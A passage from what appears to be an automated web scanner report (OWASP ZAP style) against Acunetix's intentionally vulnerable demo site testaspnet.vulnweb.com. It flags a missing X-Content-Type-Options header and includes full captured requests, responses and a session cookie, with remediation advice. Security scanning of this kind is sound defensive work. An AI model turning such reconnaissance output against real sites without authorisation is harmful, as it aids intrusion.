hlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9jwc/cRnTJwdNTwN8SPSTaigKqpw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Content-Type-Options
          Solution

          Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to 'nosniff' for all web pages.

          If possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.

        18. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          The Anti-MIME-Sniffing header X-Content-Type-Options was not set to 'nosniff'. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.

          Other info

          This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.

          At "High" threshold this scan rule will not alert on client or server error responses.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WAh8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fuc2QCBw8WAh8BBbMePHA+PHN0cm9uZz5Mb25kb24sIFVLPC9zdHJvbmc+ICZuZGFzaDsgPHN0cm9uZz5NYXkgMjAxOTwvc3Ryb25nPiAmbmRhc2g7IEFjdW5ldGl4LCB0aGUgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHNvZnR3YXJlLCBoYXMgYW5ub3VuY2VkIHRoYXQgYWxsIHZlcnNpb25zIG9mIHRoZSA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvPkFjdW5ldGl4IFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjwvYT4gbm93IHN1cHBvcnQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL25ldHdvcmstc2VjdXJpdHktc2Nhbm5lci8+bmV0d29yayBzZWN1cml0eSBzY2FubmluZzwvYT4uIE5ldHdvcmsgc2VjdXJpdHkgc2NhbnMgYXJlIHBvc3NpYmxlIHRoYW5rcyB0byB0aGUgc2VhbWxlc3MgaW50ZWdyYXRpb24gb2YgQWN1bmV0aXggd2l0aCB0aGUgcG93ZXJmdWwgT3BlblZBUyBzZWN1cml0eSBzb2x1dGlvbi4gVW50aWwgbm93LCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5uaW5nIGZ1bmN0aW9uYWxpdHkgd2FzIGF2YWlsYWJsZSBvbmx5IGluIEFjdW5ldGl4IE9ubGluZS48L3A+ICAgICA8cD4mbGRxdW87Tm8gbWF0dGVyIHRoZSBzaXplIG9mIHlvdXIgYnVzaW5lc3MsIHlvdSB1c2UgbXVsdGlwbGUgc2VjdXJpdHkgbWVhc3VyZXMgdG8gYWxsZXZpYXRlIGRpZmZlcmVudCB0eXBlcyBvZiByaXNrcy4gWW91ciBzZWN1cml0eSBzdHJhdGVneSBtdXN0IGFsd2F5cyBpbmNsdWRlIGJvdGggd2ViIHNlY3VyaXR5IHNjYW5zIGFuZCBuZXR3b3JrIHNlY3VyaXR5IHNjYW5zLiBBbmQgaXQgbWFrZXMgaXQgc28gbXVjaCBlYXNpZXIgYW5kIG11Y2ggbW9yZSBlZmZpY2llbnQgaWYgeW91IGNhbiBkbyB0aGUgdHdvIHRvZ2V0aGVyIHVzaW5nIGEgc2luZ2xlIGludGVncmF0ZWQgdG9vbCwmcmRxdW87IHNhaWQgTmljb2xhcyBTY2liZXJyYXMsIENUTy48L3A+ICAgICA8cD5UaGVyZSBhcmUgbWFueSBhZHZhbnRhZ2VzIG9mIHJ1bm5pbmcgbmV0d29yayBzZWN1cml0eSBzY2FucyBpbiBBY3VuZXRpeC4gSGF2aW5nIGEgc2luZ2xlIGludGVncmF0ZWQgZGFzaGJvYXJkIHdpdGggYm90aCB3ZWIgYW5kIG5ldHdvcmsgdnVsbmVyYWJpbGl0aWVzIGdpdmVzIHRoZSBiZXN0IHBvc3NpYmxlIHJpc2sgdmlzaWJpbGl0eSBhbmQgc2F2ZXMgYSBsb3Qgb2YgdGltZSBhbmQgZWZmb3J0LiBOZXR3b3JrIHNjYW5zIG1heSBhbHNvIGJlbmVmaXQgZnJvbSBvdGhlciBBY3VuZXRpeCBmZWF0dXJlcywgc3VjaCBhcyA8YSBocmVmPWh0dHBzOi8vd3d3LmFjdW5ldGl4LmNvbS92dWxuZXJhYmlsaXR5LXNjYW5uZXIvYWN1bmV0aXgtaW50ZWdyYXRpb25zLz5pc3N1ZSB0cmFja2VyIGludGVncmF0aW9uPC9hPiBhbmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vdnVsbmVyYWJpbGl0eS1zY2FubmVyL3Z1bG5lcmFiaWxpdHktbWFuYWdlbWVudC1yZWd1bGF0b3J5LWNvbXBsaWFuY2UvPmNvbXByZWhlbnNpdmUgcmVwb3J0aW5nPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPk1vcmUgRmVhdHVyZXMgaW4gdGhlIExhdGVzdCBCdWlsZDwvc3Ryb25nPjwvcD4gICAgIDxwPk9wZW5WQVMgaW50ZWdyYXRpb24gaXMgaW50cm9kdWNlZCBhcyBwYXJ0IG9mIHRoZSBsYXRlc3QgQWN1bmV0aXggdmVyc2lvbiAxMiBidWlsZCAoPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmJ1aWxkIDEyLjAuMTkwNTE1MTQ5PC9hPikuIFRoaXMgbmV3IGJ1aWxkIGFsc28gaW5jbHVkZXM6PC9wPiAgICAgPHA+LSBTdXBwb3J0IGZvciBJUHY2PGJyIC8+ICAgICAtIEltcHJvdmVkIHVzYWdlIG9mIG1hY2hpbmUgcmVzb3VyY2VzPGJyIC8+ICAgICAtIEFkZGVkIHN1cHBvcnQgZm9yIFNlbGVuaXVtIHNjcmlwdHMgYXMgaW1wb3J0IGZpbGVzPGJyIC8+ICAgICAtIE11bHRpcGxlIHZ1bG5lcmFiaWxpdHkgY2hlY2tzIGZvciBTQVA8YnIgLz4gICAgIC0gVW5hdXRob3JpemVkIGFjY2VzcyBkZXRlY3Rpb24gZm9yIFJlZGlzIGFuZCBNZW1jYWNoZWQ8YnIgLz4gICAgIC0gU291cmNlIGNvZGUgZGlzY2xvc3VyZSBmb3IgUnVieSBhbmQgUHl0aG9uPC9wPiAgICAgPHA+VGhlIG5ldyBidWlsZCBhbHNvIGluY2x1ZGVzIGEgbnVtYmVyIG9mIHVwZGF0ZXMgYW5kIGZpeGVzLCBhbGwgb2Ygd2hpY2ggYXJlIGF2YWlsYWJsZSBmb3IgYm90aCBXaW5kb3dzIGFuZCBMaW51eC4gTW9yZSBpbmZvcm1hdGlvbiBjYW4gYmUgZm91bmQgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vYmxvZy9yZWxlYXNlcy9uZXctYnVpbGQtbmV0d29yay1zY2FubmluZy1pbnRlZ3JhdGlvbi1pcHY2LXN1cHBvcnQvPmhlcmU8L2E+LjwvcD4gICAgIDxwPkdldCBhIGRlbW8gb2YgdGhlIHByb2R1Y3QgPGEgaHJlZj1odHRwczovL3d3dy5hY3VuZXRpeC5jb20vbmV0d29yay1zZWN1cml0eS1zY2FubmVyLz5oZXJlPC9hPi48L3A+ICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD4gICAgIDxwPjxzdHJvbmc+QWN1bmV0aXgsIHRoZSBDb21wYW55PC9zdHJvbmc+PC9wPiAgICAgPHA+Rm91bmRlZCBpbiAyMDA0IHRvIGNvbWJhdCB0aGUgYWxhcm1pbmcgcmlzZSBpbiB3ZWIgYXBwbGljYXRpb24gYXR0YWNrcywgQWN1bmV0aXggaXMgdGhlIG1hcmtldCBsZWFkZXIgYW5kIGEgcGlvbmVlciBpbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+dfic04fJFrwdgOeBd3JBjK63E5g==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
